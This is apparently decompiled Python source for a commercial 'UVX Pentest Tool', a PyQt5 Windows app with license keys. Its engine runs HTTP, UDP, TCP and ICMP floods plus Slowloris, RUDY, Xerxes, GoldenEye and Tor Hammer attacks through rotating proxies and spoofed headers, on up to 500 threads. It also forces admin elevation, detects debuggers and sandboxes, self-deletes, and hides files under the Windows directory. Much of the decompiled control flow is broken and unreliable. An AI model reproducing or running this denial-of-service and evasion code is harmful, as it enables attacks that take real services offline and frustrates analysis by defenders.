import sys
import os
import json
import time
import threading
import random
import string
import subprocess
import socket
import ipaddress
import concurrent.futures
import requests
import urllib3
import psutil
from datetime import datetime, timedelta
from fake_useragent import UserAgent
from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QVBoxLayout, QHBoxLayout, QLabel, QLineEdit, QPushButton, QStackedWidget, QTextEdit, QFrame, QMessageBox, QFileDialog, QProgressBar, QGroupBox, QGraphicsDropShadowEffect, QSizePolicy, QSpacerItem, QTableWidget, QTableWidgetItem, QHeaderView, QTabWidget, QComboBox, QCheckBox, QSplitter
from PyQt5.QtCore import Qt, QTimer, QObject, pyqtSignal, QPropertyAnimation, QEasingCurve, QRect
from PyQt5.QtGui import QPixmap, QFont, QColor, QIcon, QPainter, QBrush, QLinearGradient, QPalette
import ctypes
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def is_admin():
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False
if not is_admin():
    ctypes.windll.shell32.ShellExecuteW(None, 'runas', sys.executable, ' '.join(sys.argv), None, 1)
    sys.exit()
print('[UVX Pentest Tool | www.uvxcommunity.shop]')
SUSPICIOUS_PROCESSES = ['x64dbg.exe', 'x32dbg.exe', 'ida.exe', 'ida64.exe', 'ollydbg.exe', 'windbg.exe', 'dbgview.exe', 'processhacker.exe', 'procmon.exe', 'wireshark.exe', 'ollydbg', 'immunitydebugger.exe', 'cheatengine.exe', 'hxd.exe', 'lordpe.exe', 'peid.exe', 'resourcehacker.exe', 'importrec.exe', 'cffexplorer.exe', 'de4dot.exe', 'dnspy.exe', 'ilspy.exe', 'reflexil.exe', 'simpleassembly.exe', 'pebrowse.exe', 'reshacker.exe', 'stud_pe.exe', 'vb_decompiler.exe', 'dotpeek.exe', 'jetbrains.exe', 'fiddler.exe', 'burpsuite.exe', 'charles.exe', 'mitmproxy.exe', 'zap.exe', 'wpepro.exe', 'artmoney.exe', 'gameguardian.exe', 'cheatengine-x86_64.exe', 'scyllahide.exe', 'sharpod.exe', 'hidetoolz.exe', 'processexplorer.exe', 'sysinternals.exe', 'tcpview.exe', 'filemon.exe', 'regmon.exe', 'vmmap.exe']

def is_debugger_running():
    """بررسی می‌کند که آیا یکی از دیباگرها یا ابزارهای آنالیز در حال اجراست یا خیر."""  # inserted
    try:
        for proc in psutil.process_iter(['name', 'exe']):
            try:
                process_name = proc.info['name'].lower() if proc.info['name'] else ''
                process_exe = proc.info['exe'].lower() if proc.info['exe'] else ''
                for suspicious in SUSPICIOUS_PROCESSES:
                    if suspicious.lower() in process_name or suspicious.lower() in process_exe:
                        pass  # postinserted
                    else:  # inserted
                        print(f'⚠️ Suspicious process detected: {process_name} ({process_exe})')
                    except:
                        return True
                    suspicious_keywords = ['debug', 'dbg', 'ida', 'olly', 'windbg', 'hacker', 'cheat', 'decompiler', 'disassembler', 'analyzer', 'sniffer', 'inject', 'hook', 'dump', 'memory', 'reverse', 'crack', 'patch', 'bypass']
                    for keyword in suspicious_keywords:
                        if keyword in process_name or keyword in process_exe:
                            pass  # postinserted
                        else:  # inserted
                            print(f'⚠️ Suspicious keyword detected: {process_name} ({process_exe})')
                            return True
        else:  # inserted
            return False
        except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
            continue
    except Exception as e:
        print(f'Error in debugger detection: {e}')
        return False

def check_system_environment():
    """بررسی محیط سیستم برای تشخیص ماشین مجازی یا محیط تست"""  # inserted
    try:
        running_processes = [proc.info['name'].lower() for proc in psutil.process_iter(['name']) if proc.info['name']]
            for vm_indicators in ['vbox', 'virtual', 'qemu', 'xen'] for indicator in vm_indicators:
                for process in running_processes:
                    if indicator in process:
                        pass  # postinserted
                    else:  # inserted
                        print(f'⚠️ VM environment detected: {process}')
                        return True
            else:  # inserted
                computer_name = os.environ.get('COMPUTERNAME', '').lower()
                vm_computer_names = ['virtual', 'test', 'sandbox']
                for name in vm_computer_names:
                    if name in computer_name:
                        pass  # postinserted
                    else:  # inserted
                        print(f'⚠️ Suspicious computer name: {computer_name}')
                        return True
                    return False
    except Exception as e:
        print(f'Error in environment check: {e}')
        return False

def self_destruct():
    """حذف خودکار فایل اجرایی فعلی."""  # inserted
    try:
        print('🚨 Self-destruct sequence initiated!')
        script = f'\n        @echo off\n        chcp 65001 >nul\n        echo UVX Pentest Tool - Self Destruction Activated\n        timeout /t 3 /nobreak >nul\n        del \"{os.path.abspath(sys.argv[0])}\" >nul 2>&1\n        if exist \"{os.path.abspath(sys.argv[0])}\" (\n            echo Failed to delete main file. Attempting alternate method...\n            move \"{os.path.abspath(sys.argv[0])}\" \"%TEMP%\\temp_delete.bat\" >nul 2>&1\n            del \"%TEMP%\\temp_delete.bat\" >nul 2>&1\n        )\n        echo Cleanup completed.\n        del \"%~f0\" >nul 2>&1\n        '
        temp_bat = os.path.join(os.environ['TEMP'], 'uvx_self_destruct.bat')
        with open(temp_bat, 'w', encoding='utf-8') as f:
            f.write(script)
                subprocess.Popen(f'\"{temp_bat}\"', shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
                sys.exit(0)
    except Exception as e:
        print(f'Error in self-destruct: {e}')
        sys.exit(1)

def security_check():
    """انجام بررسی‌های امنیتی قبل از اجرای برنامه اصلی"""  # inserted
    print('🔒 Starting security checks...')
    if is_debugger_running():
        print('🚨 Debugger detected! Activating self-destruct...')
        self_destruct()
    if check_system_environment():
        print('🚨 Suspicious environment detected! Activating self-destruct...')
        self_destruct()
    print('✅ Security checks passed. Starting main application...')

class ProxyManager:
    """مدیریت پروکسی‌ها"""

    def __init__(self):
        self.proxies = []
        self.current_proxy_index = 0
        self.proxy_file_path = None
        self.use_proxy = False

    def load_proxies_from_file(self, file_path):
        """بارگذاری پروکسی‌ها از فایل"""  # inserted
        try:
            with open(file_path, 'r', encoding='utf-8') as f:
                lines = f.readlines()
                    self.proxies = []
                    for line in lines:
                        line = line.strip()
                        if line and (not line.startswith('#')):
                            pass  # postinserted
                        else:  # inserted
                            if '://' in line:
                                self.proxies.append(line)
                            else:  # inserted
                                if ':' in line:
                                    pass  # postinserted
                                else:  # inserted
                                    parts = line.split(':')
                                    if len(parts) >= 2:
                                        pass  # postinserted
                                    else:  # inserted
                                        ip = parts[0]
                                        port = parts[1]
                                        self.proxies.append(f'http://{ip}:{port}')
                    else:  # inserted
                        self.proxy_file_path = file_path
                        return len(self.proxies)
        except Exception as e:
            print(f'Error loading proxies: {e}')
            return 0

    def get_next_proxy(self):
        """دریافت پروکسی بعدی به صورت چرخشی"""  # inserted
        if self.proxies and (not self.use_proxy):
            pass  # postinserted
        return None

    def get_random_proxy(self):
        """دریافت پروکسی تصادفی"""  # inserted
        if self.proxies and (not self.use_proxy):
            pass  # postinserted
        return None

    def get_proxy_dict(self, proxy_url):
        """تبدیل آدرس پروکسی به دیکشنری قابل استفاده در requests"""  # inserted
        if not proxy_url:
            pass  # postinserted
        return None

    def validate_proxy(self, proxy_url, timeout=5):
        """اعتبارسنجی پروکسی"""  # inserted
        try:
            proxies = self.get_proxy_dict(proxy_url)
            response = requests.get('http://httpbin.org/ip', proxies=proxies, timeout=timeout, verify=False)
            return response.status_code == 200
        except:
            return False

    def validate_all_proxies(self, console_callback=None):
        """اعتبارسنجی تمام پروکسی‌ها"""  # inserted
        valid_proxies = []
        for proxy in self.proxies:
            if self.validate_proxy(proxy):
                valid_proxies.append(proxy)
                if console_callback:
                    console_callback(f'[PROXY] Valid: {proxy}')
            else:  # inserted
                if console_callback:
                    pass  # postinserted
                else:  # inserted
                    console_callback(f'[PROXY] Invalid: {proxy}')
        self.proxies = valid_proxies
        return len(valid_proxies)

class AdvancedPentestEngine:
    def __init__(self):
        self.ua = UserAgent()
        self.active_attacks = 0
        self.max_threads = 500
        self.proxy_manager = ProxyManager()
        self.attack_methods = {'HTTP_FLOOD': self.http_flood, 'SLOW_LORIS': self.slow_loris, 'UDP_FLOOD': self.udp_flood, 'TCP_FLOOD': self.tcp_flood, 'ICMP_FLOOD': self.icmp_flood, 'RUDY': self.rudy_attack, 'XERXES': self.xerxes_attack, 'GOLDEN_EYE': self.golden_eye, 'TOR_HAMMER': self.tor_hammer}
        self.user_agents = ['Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0', 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1']

    def generate_payload(self, size=1024):
        """تولید پایلود تصادفی"""  # inserted
        return ''.join(random.choices(string.ascii_letters + string.digits, k=size))

    def http_flood(self, target, port, duration, console_callback):
        """حمله HTTP Flood پیشرفته با پشتیبانی از پروکسی"""  # inserted
        end_time = time.time() + duration
        url = f'http://{target}:{port}/' if port!= 80 else f'http://{target}/'
        if time.time() < end_time and self.active_attacks > 0:
            try:
                proxy_url = self.proxy_manager.get_random_proxy()
                proxies = self.proxy_manager.get_proxy_dict(proxy_url)
                headers = {'User-Agent': random.choice(self.user_agents), 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Cache-Control': 'no-cache', 'X-Forwarded-For': f'{random.randint(1, 255)}.{random.randint(1, 255)}.{random.randint(1, 255)}.{random.randint(1, 255)}'}
                start_time = time.time()
                response = requests.get(url, headers=headers, proxies=proxies, timeout=5, verify=False)
                response_time = time.time() - start_time
                proxy_info = f' via {proxy_url}' if proxy_url else ''
                console_callback(f'[HTTP_FLOOD] GET {url} - Status: {response.status_code} - Time: {response_time:.3f}s{proxy_info}')
                post_data = {'data': self.generate_payload(500)}
                response = requests.post(url, data=post_data, headers=headers, proxies=proxies, timeout=5, verify=False)
                console_callback(f'[HTTP_FLOOD] POST {url} - Status: {response.status_code}{proxy_info}')
                time.sleep(0.1)
        except Exception as e:
            console_callback(f'[HTTP_FLOOD] Error: {str(e)}')

    def slow_loris(self, target, port, duration, console_callback):
        """حمله Slow Loris"""  # inserted
        end_time = time.time() + duration
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(10)
            s.connect((target, port))
            headers = 'GET / HTTP/1.1\r\n'
            headers += f'Host: {target}\r\n'
            headers += 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n'
            headers += 'Content-Length: 1000000\r\n'
            headers += 'X-a: b\r\n'
            s.send(headers.encode())
            console_callback(f'[SLOW_LORIS] Connected to {target}:{port}')
            if time.time() < end_time and self.active_attacks > 0:
                try:
                    s.send('X-c: d\r\n'.encode())
                    console_callback(f'[SLOW_LORIS] Keeping connection alive to {target}:{port}')
                    time.sleep(10)
            except:
                return
        except Exception as e:
            console_callback(f'[SLOW_LORIS] Error: {str(e)}')

    def udp_flood(self, target, port, duration, console_callback):
        """حمله UDP Flood"""  # inserted
        end_time = time.time() + duration
        payload = self.generate_payload(1024).encode()
        if time.time() < end_time:
            if self.active_attacks > 0:
                try:
                    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                    s.sendto(payload, (target, port))
                    console_callback(f'[UDP_FLOOD] Packet sent to {target}:{port}')
                    s.close()
        except Exception as e:
            console_callback(f'[UDP_FLOOD] Error: {str(e)}')

    def tcp_flood(self, target, port, duration, console_callback):
        """حمله TCP Flood"""  # inserted
        end_time = time.time() + duration
        payload = self.generate_payload(512).encode()
        if time.time() < end_time and self.active_attacks > 0:
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.settimeout(2)
                s.connect((target, port))
                s.send(payload)
                console_callback(f'[TCP_FLOOD] Connection established with {target}:{port}')
                s.close()
        except Exception as e:
            console_callback(f'[TCP_FLOOD] Error: {str(e)}')

    def icmp_flood(self, target, duration, console_callback):
        """حمله ICMP Flood (Ping Flood)"""  # inserted
        end_time = time.time() + duration
        if time.time() < end_time and self.active_attacks > 0:
            try:
                if os.name == 'nt':
                    subprocess.Popen(['ping', '-n', '1', '-w', '1000', target], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
                console_callback(f'[ICMP_FLOOD] Ping sent to {target}')
        except Exception as e:
            console_callback(f'[ICMP_FLOOD] Error: {str(e)}')

    def rudy_attack(self, target, port, duration, console_callback):
        """حمله R-U-Dead-Yet (RUDY)"""  # inserted
        end_time = time.time() + duration
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(10)
            s.connect((target, port))
            headers = 'POST / HTTP/1.1\r\n'
            headers += f'Host: {target}\r\n'
            headers += 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n'
            headers += 'Content-Type: application/x-www-form-urlencoded\r\n'
            headers += 'Content-Length: 1000000000\r\n\r\n'
            s.send(headers.encode())
            console_callback(f'[RUDY] Connected to {target}:{port}')
            if time.time() < end_time and self.active_attacks > 0:
                try:
                    s.send('a=1&'.encode())
                    console_callback(f'[RUDY] Sending slow data to {target}:{port}')
                    time.sleep(10)
            except:
                return
        except Exception as e:
            console_callback(f'[RUDY] Error: {str(e)}')

    def xerxes_attack(self, target, port, duration, console_callback):
        """حمله Xerxes (اتصالات TCP زیاد)"""  # inserted
        end_time = time.time() + duration
        connections = []
        if time.time() < end_time and self.active_attacks > 0:
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.settimeout(5)
                s.connect((target, port))
                connections.append(s)
                console_callback(f'[XERXES] New connection to {target}:{port} - Total: {len(connections)}')
                time.sleep(0.1)
        for conn in connections:
            pass  # postinserted
        except Exception as e:
            console_callback(f'[XERXES] Error: {str(e)}')
        except:
            pass

    def golden_eye(self, target, port, duration, console_callback):
        """حمله GoldenEye (ترکیبی از روش‌ها) با پشتیبانی از پروکسی"""  # inserted
        end_time = time.time() + duration
        url = f'http://{target}:{port}/' if port!= 80 else f'http://{target}/'
        if time.time() < end_time and self.active_attacks > 0:
            try:
                proxy_url = self.proxy_manager.get_random_proxy()
                proxies = self.proxy_manager.get_proxy_dict(proxy_url)
                headers = {'User-Agent': random.choice(self.user_agents), 'Accept': '*/*', 'Connection': 'keep-alive', 'X-Forwarded-For': f'{random.randint(1, 255)}.{random.randint(1, 255)}.{random.randint(1, 255)}.{random.randint(1, 255)}'}
                proxy_info = f' via {proxy_url}' if proxy_url else ''
                requests.get(url, headers=headers, proxies=proxies, timeout=5, verify=False)
                console_callback(f'[GOLDEN_EYE] GET request to {target}:{port}{proxy_info}')
                requests.head(url, headers=headers, proxies=proxies, timeout=5, verify=False)
                console_callback(f'[GOLDEN_EYE] HEAD request to {target}:{port}{proxy_info}')
                requests.options(url, headers=headers, proxies=proxies, timeout=5, verify=False)
                console_callback(f'[GOLDEN_EYE] OPTIONS request to {target}:{port}{proxy_info}')
        except Exception as e:
            console_callback(f'[GOLDEN_EYE] Error: {str(e)}')

    def tor_hammer(self, target, port, duration, console_callback):
        """حمله Tor Hammer (اتصالات از طریق پروکسی)"""  # inserted
        end_time = time.time() + duration
        url = f'http://{target}:{port}/' if port!= 80 else f'http://{target}/'
        if time.time() < end_time and self.active_attacks > 0:
            try:
                proxy_url = self.proxy_manager.get_random_proxy()
                proxies = self.proxy_manager.get_proxy_dict(proxy_url)
                headers = {'User-Agent': random.choice(self.user_agents), 'X-Forwarded-For': f'{random.randint(1, 255)}.{random.randint(1, 255)}.{random.randint(1, 255)}.{random.randint(1, 255)}'}
                proxy_info = f' via {proxy_url}' if proxy_url else ' without proxy'
                response = requests.get(url, headers=headers, proxies=proxies, timeout=10, verify=False)
                console_callback(f'[TOR_HAMMER] Request{proxy_info} - Status: {response.status_code}')
        except Exception as e:
            console_callback(f'[TOR_HAMMER] Error: {str(e)}')

    def load_proxies(self, file_path, console_callback):
        """بارگذاری پروکسی‌ها از فایل"""  # inserted
        count = self.proxy_manager.load_proxies_from_file(file_path)
        if count > 0:
            console_callback(f'[PROXY] Loaded {count} proxies from {file_path}')
        return True

    def validate_proxies(self, console_callback):
        """اعتبارسنجی پروکسی‌ها"""  # inserted
        valid_count = self.proxy_manager.validate_all_proxies(console_callback)
        console_callback(f'[PROXY] Validation completed: {valid_count} valid proxies')
        return valid_count

    def set_proxy_usage(self, use_proxy):
        """تنظیم استفاده از پروکسی"""  # inserted
        self.proxy_manager.use_proxy = use_proxy

    def start_attack(self, method, target, port, duration, threads, console_callback):
        """شروع حمله با متد مشخص"""  # inserted
        if method not in self.attack_methods:
            console_callback(f'[ERROR] Unknown attack method: {method}')
        return False

    def stop_attacks(self):
        """توقف تمام حملات"""  # inserted
        self.active_attacks = 0

class NotificationManager:
    @staticmethod
    def show_notification(title, message, level='info', duration=3000):
        return

class LicenseManager:
    def __init__(self):
        self.hidden_license_dir = 'C:\\Windows\\debug\\SystemCache'
        os.makedirs(self.hidden_license_dir, exist_ok=True)
        self.license_file = os.path.join(self.hidden_license_dir, 'pentest_license.bin')
        self.license_data = self.load_license_data()
        self.licenses = {'1_day': ['PENTEST1D-9234J1A', 'PENTEST1D-12X933L', 'PENTEST1D-21Q339T', 'PENTEST1D-33Z84R2Y', 'PENTEST1D-92W3J6V', 'PENTEST1D-312B7Q', 'PENTEST1D-3339K1L', 'PENTEST1D-8333P9N', 'PENTEST1D-71D2X10G', 'PENTEST1D-22L8V11X', 'PENTEST1D-1033R7M', 'PENTEST1D-3381D0C', '1238YSDISJD', '12381232YSDISJD', '1238YSD5454ISJD', '1238YSDI562SJD', '1238324YSDISJD', '1238YSDIS3JD', '1238YSDDISJD', '1238YSFDISJD', '1238YDSDISJD', '1238YS1DISJD', '1238YSDI2SJD', '123F8YSDISJD', '1238DYSDISJD', '1238YSDISFJD', '1238YESDISJD']}

    def load_license_data(self):
        try:
            if os.path.exists(self.license_file):
                with open(self.license_file, 'r', encoding='utf-8') as f:
                    return json.load(f)
            break
        except Exception as e:
            print(f'Error loading license data: {e}')

    def save_license_data(self):
        try:
            subprocess.run(f'attrib +h \"{self.hidden_license_dir}\"', shell=True, capture_output=True) if os.name == 'nt' else self.hidden_license_dir
            with open(self.license_file, 'w', encoding='utf-8') as f:
                json.dump(self.license_data, f, ensure_ascii=False, indent=4)
                    return True
        except Exception as e:
            print(f'Error saving license data: {e}')
            return False

    def validate_license(self, license_key):
        license_key = license_key.strip().upper()
        if license_key in self.licenses['1_day']:
            expiry_date = datetime.now() + timedelta(days=1)
            return (True, expiry_date, '1 Day Pentest License')

    def activate_license(self, license_key):
        valid, expiry_date, license_type = self.validate_license(license_key)
        if valid:
            self.license_data = {'activated': True, 'license_key': license_key, 'expiry_date': expiry_date.strftime('%Y-%m-%d %H:%M:%S'), 'license_type': license_type, 'activation_date': datetime.now().strftime('%Y-%m-%d %H:%M:%S')}
            if self.save_license_data():
                return (True, license_type, expiry_date)

    def check_license_status(self):
        if not self.license_data.get('activated', False):
            pass  # postinserted
        return (False, None, None, 'Not activated')

class LoadingScreen(QWidget):
    def __init__(self):
        super().__init__()
        self.setFixedSize(400, 400)
        self.setWindowFlags(Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint)
        self.setAttribute(Qt.WA_TranslucentBackground)
        self.setup_ui()

    def setup_ui(self):
        layout = QVBoxLayout()
        layout.setAlignment(Qt.AlignCenter)
        self.background_frame = QFrame()
        self.background_frame.setStyleSheet('\n            QFrame {\n                background: qlineargradient(x1: 0, y1: 0, x2: 1, y2: 1,\n                    stop: 0 #0a192f, stop: 0.5 #1a202c, stop: 1 #2d3748);\n                border-radius: 25px;\n                border: 2px solid #63b3ed;\n            }\n        ')
        self.background_frame.setFixedSize(350, 350)
        shadow = QGraphicsDropShadowEffect()
        shadow.setBlurRadius(50)
        shadow.setColor(QColor(99, 179, 237, 150))
        shadow.setOffset(0, 0)
        self.background_frame.setGraphicsEffect(shadow)
        inner_layout = QVBoxLayout(self.background_frame)
        inner_layout.setAlignment(Qt.AlignCenter)
        inner_layout.setSpacing(30)
        self.logo_label = QLabel('⚡')
        self.logo_label.setAlignment(Qt.AlignCenter)
        self.logo_label.setStyleSheet('font-size: 80px;')
        self.title_label = QLabel('UVX PENTEST TOOL')
        self.title_label.setAlignment(Qt.AlignCenter)
        self.title_label.setStyleSheet('\n            color: #63b3ed;\n            font-size: 28px;\n            font-weight: bold;\n            font-family: \'Segoe UI\';\n        ')
        self.loading_text = QLabel('Initializing Advanced Pentest Engine...')
        self.loading_text.setAlignment(Qt.AlignCenter)
        self.loading_text.setStyleSheet('\n            color: #a0aec0;\n            font-size: 14px;\n            font-weight: bold;\n        ')
        self.progress_bar = QProgressBar()
        self.progress_bar.setRange(0, 100)
        self.progress_bar.setTextVisible(False)
        self.progress_bar.setFixedWidth(280)
        self.progress_bar.setFixedHeight(20)
        self.progress_bar.setStyleSheet('\n            QProgressBar {\n                background-color: rgba(45, 55, 72, 200);\n                border: 2px solid #4a5568;\n                border-radius: 10px;\n            }\n            QProgressBar::chunk {\n                background-color: qlineargradient(\n                    x1: 0, y1: 0, x2: 1, y2: 0,\n                    stop: 0 #68d391, stop: 0.5 #63b3ed, stop: 1 #805ad5\n                );\n                border-radius: 8px;\n            }\n        ')
        inner_layout.addWidget(self.logo_label)
        inner_layout.addWidget(self.title_label)
        inner_layout.addWidget(self.loading_text)
        inner_layout.addWidget(self.progress_bar)
        layout.addWidget(self.background_frame)
        self.setLayout(layout)
        self.animation = QPropertyAnimation(self.progress_bar, b'value')
        self.animation.setEasingCurve(QEasingCurve.InOutQuad)
        self.animation.setDuration(2500)
        self.animation.setStartValue(0)
        self.animation.setEndValue(100)
        self.animation.setLoopCount((-1))
        self.animation.start()

    def update_progress(self, value):
        self.progress_bar.setValue(value)

    def update_text(self, text):
        self.loading_text.setText(text)

class PentestApp(QMainWindow):
    def __init__(self):
        super().__init__()
        self.loading_screen = LoadingScreen()
        self.loading_screen.show()
        QApplication.processEvents()
        self.license_manager = LicenseManager()
        self.pentest_engine = AdvancedPentestEngine()
        self.attack_threads = []
        self.is_attacking = False
        self.loading_screen.update_text('Initializing UI Components...')
        self.setup_ui()
        self.license_timer = QTimer()
        self.license_timer.timeout.connect(self.update_license_timer)
        self.license_timer.start(1000)
        self.loading_screen.update_text('Validating License...')
        self.check_initial_license()
        self.loading_screen.close()
        self.show()

    def setup_ui(self):
        self.setWindowTitle('UVX Advanced Pentest Tool | www.uvxcommunity.shop')
        self.setGeometry(100, 100, 1400, 900)
        self.setWindowFlags(Qt.FramelessWindowHint)
        self.setAttribute(Qt.WA_TranslucentBackground)
        self.setAutoFillBackground(True)
        palette = self.palette()
        gradient = QLinearGradient(0, 0, 0, self.height())
        gradient.setColorAt(0, QColor(10, 25, 47))
        gradient.setColorAt(0.5, QColor(26, 32, 44))
        gradient.setColorAt(1, QColor(45, 55, 72))
        palette.setBrush(QPalette.Window, QBrush(gradient))
        self.setPalette(palette)
        self.setStyleSheet('\n            QMainWindow {\n                background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,\n                    stop: 0 #0a192f, stop: 0.5 #1a202c, stop: 1 #2d3748);\n                border-radius: 15px;\n            }\n            QWidget {\n                color: #ffffff;\n                font-family: \'Segoe UI\';\n                background: transparent;\n            }\n            QLineEdit, QComboBox {\n                background-color: rgba(45, 55, 72, 200);\n                border: 2px solid #4a5568;\n                border-radius: 8px;\n                padding: 12px;\n                color: #ffffff;\n                font-size: 14px;\n                selection-background-color: #63b3ed;\n            }\n            QLineEdit:focus, QComboBox:focus {\n                border: 2px solid #63b3ed;\n                background-color: rgba(45, 55, 72, 230);\n            }\n            QPushButton {\n                background-color: rgba(45, 55, 72, 200);\n                border: 2px solid #4a5568;\n                border-radius: 8px;\n                padding: 15px;\n                color: #ffffff;\n                font-size: 14px;\n                font-weight: bold;\n                min-width: 120px;\n            }\n            QPushButton:hover {\n                background-color: rgba(74, 85, 104, 200);\n                border: 2px solid #63b3ed;\n            }\n            QPushButton:pressed {\n                background-color: rgba(26, 32, 44, 200);\n            }\n            QTextEdit {\n                background-color: rgba(26, 32, 44, 180);\n                border: 2px solid #4a5568;\n                border-radius: 8px;\n                color: #00ff00;\n                font-family: \'Consolas\', \'Courier New\';\n                font-size: 11px;\n            }\n            QFrame {\n                background-color: rgba(26, 32, 44, 180);\n                border-radius: 10px;\n            }\n            QProgressBar {\n                border: 2px solid #4a5568;\n                border-radius: 5px;\n                text-align: center;\n                background-color: rgba(26, 32, 44, 180);\n            }\n            QProgressBar::chunk {\n                background-color: qlineargradient(\n                    x1: 0, y1: 0, x2: 1, y2: 0,\n                    stop: 0 #68d391, stop: 0.5 #63b3ed, stop: 1 #805ad5\n                );\n                border-radius: 3px;\n            }\n            QGroupBox {\n                color: #63b3ed;\n                font-weight: bold;\n                font-size: 16px;\n                border: 2px solid #4a5568;\n                border-radius: 8px;\n                margin-top: 10px;\n                padding-top: 15px;\n            }\n            QGroupBox::title {\n                subcontrol-origin: margin;\n                left: 10px;\n                padding: 0 5px 0 5px;\n            }\n            QTabWidget::pane {\n                border: 2px solid #4a5568;\n                border-radius: 8px;\n                background-color: rgba(26, 32, 44, 180);\n            }\n            QTabBar::tab {\n                background-color: #2d3748;\n                color: #a0aec0;\n                padding: 12px 24px;\n                border-top-left-radius: 6px;\n                border-top-right-radius: 6px;\n                margin-right: 2px;\n                font-weight: bold;\n            }\n            QTabBar::tab:selected {\n                background-color: #63b3ed;\n                color: #0a192f;\n            }\n            QTabBar::tab:hover {\n                background-color: #4a5568;\n            }\n        ')
        self.central_widget = QStackedWidget()
        self.setCentralWidget(self.central_widget)
        self.license_page = self.create_license_page()
        self.pentest_page = self.create_pentest_page()
        self.central_widget.addWidget(self.license_page)
        self.central_widget.addWidget(self.pentest_page)

    def create_license_page(self):
        page = QWidget()
        layout = QVBoxLayout()
        layout.setContentsMargins(0, 0, 0, 0)
        header_widget = QWidget()
        header_widget.setFixedHeight(50)
        header_layout = QHBoxLayout(header_widget)
        header_layout.setContentsMargins(20, 0, 20, 0)
        close_btn = QPushButton('✕')
        close_btn.setFixedSize(30, 30)
        close_btn.setStyleSheet('\n            QPushButton {\n                background-color: #e53e3e;\n                color: white;\n                border: none;\n                border-radius: 15px;\n                font-weight: bold;\n            }\n            QPushButton:hover {\n                background-color: #c53030;\n                border: 2px solid #fed7d7;\n            }\n        ')
        close_btn.clicked.connect(self.close)
        header_layout.addStretch()
        header_layout.addWidget(close_btn)
        content_widget = QWidget()
        content_layout = QVBoxLayout()
        content_widget.setMaximumWidth(500)
        logo_label = QLabel('🛡️')
        logo_label.setAlignment(Qt.AlignCenter)
        logo_label.setStyleSheet('font-size: 100px; margin-bottom: 20px;')
        title_label = QLabel('UVX ADVANCED PENTEST TOOL')
        title_label.setAlignment(Qt.AlignCenter)
        title_label.setStyleSheet('\n            font-size: 28px;\n            font-weight: bold;\n            color: #63b3ed;\n            margin: 20px 0px;\n        ')
        license_frame = QFrame()
        license_frame.setStyleSheet('\n            QFrame {\n                background: qlineargradient(x1: 0, y1: 0, x2: 1, y2: 0,\n                    stop: 0 rgba(45, 55, 72, 200), stop: 1 rgba(74, 85, 104, 200));\n                border: 2px solid #63b3ed;\n                border-radius: 15px;\n                padding: 30px;\n            }\n        ')
        shadow = QGraphicsDropShadowEffect()
        shadow.setBlurRadius(30)
        shadow.setColor(QColor(99, 179, 237, 100))
        shadow.setOffset(0, 0)
        license_frame.setGraphicsEffect(shadow)
        license_layout = QVBoxLayout()
        license_layout.setSpacing(20)
        license_label = QLabel('ENTER LICENSE KEY')
        license_label.setAlignment(Qt.AlignCenter)
        license_label.setStyleSheet('\n            font-size: 18px;\n            font-weight: bold;\n            color: #63b3ed;\n        ')
        self.license_input = QLineEdit()
        self.license_input.setPlaceholderText('Enter your premium license key...')
        self.license_input.setAlignment(Qt.AlignCenter)
        self.license_input.setEchoMode(QLineEdit.Password)
        info_label = QLabel('🔐 Premium Features:\n• Advanced DDoS Protection Testing\n• Web Application Security Scanning\n• VPS Stress Testing Tools\n• Real-time Attack Monitoring\n• Multi-threaded Attack Engine\n• Proxy Support for Anonymity\n\n🌐 Visit: www.uvxcommunity.shop')
        info_label.setStyleSheet('color: #a0aec0; font-size: 12px;')
        info_label.setAlignment(Qt.AlignCenter)
        submit_btn = QPushButton('⚡ ACTIVATE PREMIUM LICENSE')
        submit_btn.clicked.connect(self.activate_license)
        submit_btn.setStyleSheet('\n            QPushButton {\n                background: qlineargradient(x1: 0, y1: 0, x2: 1, y2: 0,\n                    stop: 0 #68d391, stop: 0.5 #63b3ed, stop: 1 #805ad5);\n                color: #0a192f;\n                font-weight: bold;\n                font-size: 16px;\n                padding: 20px;\n                border: none;\n                border-radius: 10px;\n            }\n            QPushButton:hover {\n                background: qlineargradient(x1: 0, y1: 0, x2: 1, y2: 0,\n                    stop: 0 #63b3ed, stop: 0.5 #805ad5, stop: 1 #d53f8c);\n            }\n        ')
        self.loading_label = QLabel()
        self.loading_label.setAlignment(Qt.AlignCenter)
        self.loading_label.hide()
        license_layout.addWidget(license_label)
        license_layout.addWidget(self.license_input)
        license_layout.addWidget(info_label)
        license_layout.addWidget(submit_btn)
        license_layout.addWidget(self.loading_label)
        license_frame.setLayout(license_layout)
        content_layout.addStretch()
        content_layout.addWidget(logo_label)
        content_layout.addWidget(title_label)
        content_layout.addWidget(license_frame)
